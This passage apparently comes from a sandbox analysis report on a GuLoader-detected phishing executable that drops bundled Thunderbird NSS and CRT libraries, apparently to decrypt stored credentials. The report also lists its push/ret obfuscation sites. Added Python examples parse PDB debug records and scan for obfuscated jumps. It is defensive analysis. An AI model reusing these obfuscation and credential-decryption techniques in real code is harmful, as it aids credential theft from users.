Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr
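The PDB paths above are recovered from the CodeView "RSDS" debug record embedded in each dropped DLL, and the z:\task_1552562425\build\src\obj-thunderbird\ prefix attributes them to a Mozilla Thunderbird build tree that the stealer bundles rather than code the attacker wrote. The parser below is an added example, not from the report: it decodes a raw RSDS record (signature, GUID, age, NUL-terminated path), derives the symbol-server lookup key, and classifies the path. The record is constructed: the path is the one the report lists for nss3.dll, while the GUID and age are made up, and the code scans a raw buffer instead of walking a PE debug directory.

```python
import struct
import uuid


def parse_rsds(blob):
    """Parse 'RSDS' + GUID(16, little-endian layout) + age(4) + NUL-terminated path."""
    if len(blob) < 24 or blob[:4] != b"RSDS":
        return None
    guid = uuid.UUID(bytes_le=blob[4:20])
    age = struct.unpack_from("<I", blob, 20)[0]
    end = blob.find(b"\x00", 24)
    path = blob[24:end if end != -1 else len(blob)].decode("utf-8", "replace")
    # Symbol-server key: upper-case GUID hex without dashes, immediately followed by the age
    key = "%s%X" % (guid.hex.upper(), age)
    return {"guid": str(guid), "age": age, "path": path, "symsrv_key": key}


def find_rsds_records(data):
    """Scan a raw buffer for every RSDS record with a non-empty path (strings-style triage)."""
    out, pos = [], 0
    while (pos := data.find(b"RSDS", pos)) != -1:
        rec = parse_rsds(data[pos:])
        if rec and rec["path"]:
            out.append(rec)
        pos += 4
    return out


def classify_pdb_path(path):
    """Attribute a dropped DLL from its build path: Thunderbird tree, CRT forwarder, or unknown."""
    p = path.lower().rsplit("\\", 1)[-1] if "obj-thunderbird" not in path.lower() else path.lower()
    if "obj-thunderbird" in p:
        return "mozilla-thunderbird"
    if p.startswith("api-ms-win-") or p in ("ucrtbase.pdb", "vcruntime140.i386.pdb", "msvcp140.i386.pdb"):
        return "microsoft-crt"
    return "unknown"


# Constructed record: real path from the report, made-up GUID and age.
NSS3_PATH = b"z:\\task_1552562425\\build\\src\\obj-thunderbird\\security\\nss3.pdb"
FAKE_GUID = uuid.UUID("12345678-1234-5678-9abc-def012345678")
RECORD = b"RSDS" + FAKE_GUID.bytes_le + struct.pack("<I", 1) + NSS3_PATH + b"\x00"
# Surrounding bytes plus a second, empty RSDS record that the scanner must ignore.
BUFFER = b"\x00" * 7 + RECORD + b"padding" + b"RSDS" + b"\x00" * 20
```

The symsrv key is what a symbol server would be queried with (nss3.pdb/<key>/nss3.pdb), which is how an analyst confirms a dropped DLL is an unmodified Mozilla build: a hash match against the vendor's published symbols means the binary is a legitimate component abused for its key4.db decryption routines, not a trojanised copy.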

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
PE file contains sections with non-standard names
Source: sqlite3.dll.4.dr Static PE information: section name: /4
Source: sqlite3.dll.4.dr Static PE information: section name: /19
Source: sqlite3.dll.4.dr Static PE information: section name: /31
Source: sqlite3.dll.4.dr Static PE information: section name: /45
Source: sqlite3.dll.4.dr Static PE information: section name: /57
Source: sqlite3.dll.4.dr Static PE information: section name: /70
Source: sqlite3.dll.4.dr Static PE information: section name: /81
Source: sqlite3.dll.4.dr Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2613 push edx; ret 0_2_005D2641
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1054 push edx; ret 0_2_005D1081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2854 push edx; ret 0_2_005D2881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4054 push edx; ret 0_2_005D4081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5854 push edx; ret 0_2_005D5881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D7054 push edx; ret 0_2_005D7081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6844 push edx; ret 0_2_005D6871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0843 push edx; ret 0_2_005D0871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2043 push edx; ret 0_2_005D2071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3843 push edx; ret 0_2_005D3871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5043 push edx; ret 0_2_005D5071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0878 push edx; ret 0_2_005D08A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6875 push edx; ret 0_2_005D68A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2074 push edx; ret 0_2_005D20A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3874 push edx; ret 0_2_005D38A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5074 push edx; ret 0_2_005D50A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0068 push edx; ret 0_2_005D0091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6065 push edx; ret 0_2_005D6091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3063 push edx; ret 0_2_005D3091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1863 push edx; ret 0_2_005D1891
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4863 push edx; ret 0_2_005D4891
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0818 push edx; ret 0_2_005D0841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6814 push edx; ret 0_2_005D6841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3813 push edx; ret 0_2_005D3841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D2013 push edx; ret 0_2_005D2041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D5013 push edx; ret 0_2_005D5041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D0008 push edx; ret 0_2_005D0031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D6004 push edx; ret 0_2_005D6031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D4803 push edx; ret 0_2_005D4831
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D3003 push edx; ret 0_2_005D3031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Code function: 0_2_005D1803 push edx; ret 0_2_005D1831
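Each "push edx; ret" pair above is an indirect jump: the ret pops the value edx placed on the stack and transfers control there, so a static disassembler sees a function return where the program actually branches. The scanner below is an added example, not from the report: it walks raw x86 code bytes and reports three sequences used for this kind of control-flow hiding, push r32 followed by a ret within a short window (as in the listing), push imm32; ret (an absolute jump whose target can be decoded), and call $+5 (which pushes EIP for a following pop). The sample bytes are constructed; the linear byte walk is a heuristic and on real binaries should be replaced by a proper disassembler such as capstone so operand bytes are not mistaken for opcodes.

```python
import struct

# Single-byte push r32 opcodes 0x50..0x57, in the register order the encoding uses
PUSH_REG = {0x50 + i: r for i, r in enumerate(["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
RET = b"\xc3"


def scan_obfuscated_jumps(code, base=0, max_gap=64):
    """Return dicts describing push/ret and call-$+5 sequences found in raw code bytes."""
    hits = []
    n = len(code)
    for i in range(n):
        b = code[i]
        if b in PUSH_REG:
            # push reg ... ret within max_gap bytes: control goes to the register's value
            j = code.find(RET, i + 1, i + 1 + max_gap)
            if j != -1:
                hits.append({"kind": "push_reg_ret", "at": base + i, "ret_at": base + j,
                             "target": PUSH_REG[b]})
        elif b == 0x68 and i + 5 < n and code[i + 5] == 0xC3:
            # push imm32; ret is an absolute jmp to imm32
            imm = struct.unpack_from("<I", code, i + 1)[0]
            hits.append({"kind": "push_imm_ret", "at": base + i, "ret_at": base + i + 5,
                         "target": imm})
        elif b == 0xE8 and i + 5 <= n:
            # call rel32 with rel == 0 targets the next instruction; it exists only to push EIP
            rel = struct.unpack_from("<i", code, i + 1)[0]
            if rel == 0:
                hits.append({"kind": "call_next", "at": base + i, "ret_at": None,
                             "target": base + i + 5})
    return hits


# Constructed code bytes exercising all three patterns.
SAMPLE_CODE = bytes([
    0x8B, 0xD0,                    # mov edx, eax          (edx holds the computed target)
    0x52,                          # push edx
    0x90, 0x90, 0x90,              # nop x3                (junk between push and ret)
    0xC3,                          # ret                   -> jumps to edx
    0x68, 0x00, 0x10, 0x40, 0x00,  # push 0x401000
    0xC3,                          # ret                   -> jmp 0x401000
    0xE8, 0x00, 0x00, 0x00, 0x00,  # call $+5
    0x5B,                          # pop ebx               (ebx = address of this pop)
])
```

Reporting the push and ret addresses separately, as the sandbox does, matters because the bytes between them are often live code that the obfuscator interleaves to defeat simple two-byte signatures.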

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy_InUse.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll
